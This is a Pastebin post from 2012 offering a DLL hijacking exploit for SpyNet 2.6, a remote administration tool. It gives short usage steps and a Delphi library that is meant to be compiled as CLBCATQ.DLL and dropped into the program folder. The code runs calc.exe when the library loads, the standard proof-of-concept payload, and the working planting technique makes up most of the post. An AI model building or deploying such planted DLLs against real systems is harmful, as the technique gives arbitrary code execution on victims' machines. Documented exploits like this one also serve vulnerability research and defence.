Advertisement
Guest User

SpyNet 2.6 DLL Hijacking Exploit By xDarKCoDer

a guest
Apr 9th, 2012
152
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Delphi 0.57 KB | None | 0 0
  1. {
  2. # Exploit Title : SpyNet Remote Administrator Control 2.6 DLL Hijacking Exploit (CLBCATQ)
  3. # Author : xDarKCoDer
  4. # Data : 10-4-2012
  5. # Greetz : |Stack|rTa7|ObArmySec|A.L.G.E.R.I.A|Ghost Prince|YASSEN|Black-ID|safroto|
  6. # contact : xDarKCoDer@Hotmail.it
  7. # Tested on : Windows Xp Professional Service Pack 3
  8.  
  9. #How to use :
  10.  
  11. Take only the codes and put it in Delphi 7 and Save by name (CLBCATQ.DLL) and put it in the program folder
  12.  
  13. #CLBCATQ.DLL (code)
  14. }
  15.  
  16. library CLBCATQ;
  17.  
  18. uses
  19.   Windows;
  20.  
  21. begin
  22. Winexec(PAnsichar('C:\windows\system32\calc.exe'),sw_show);
  23. end.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement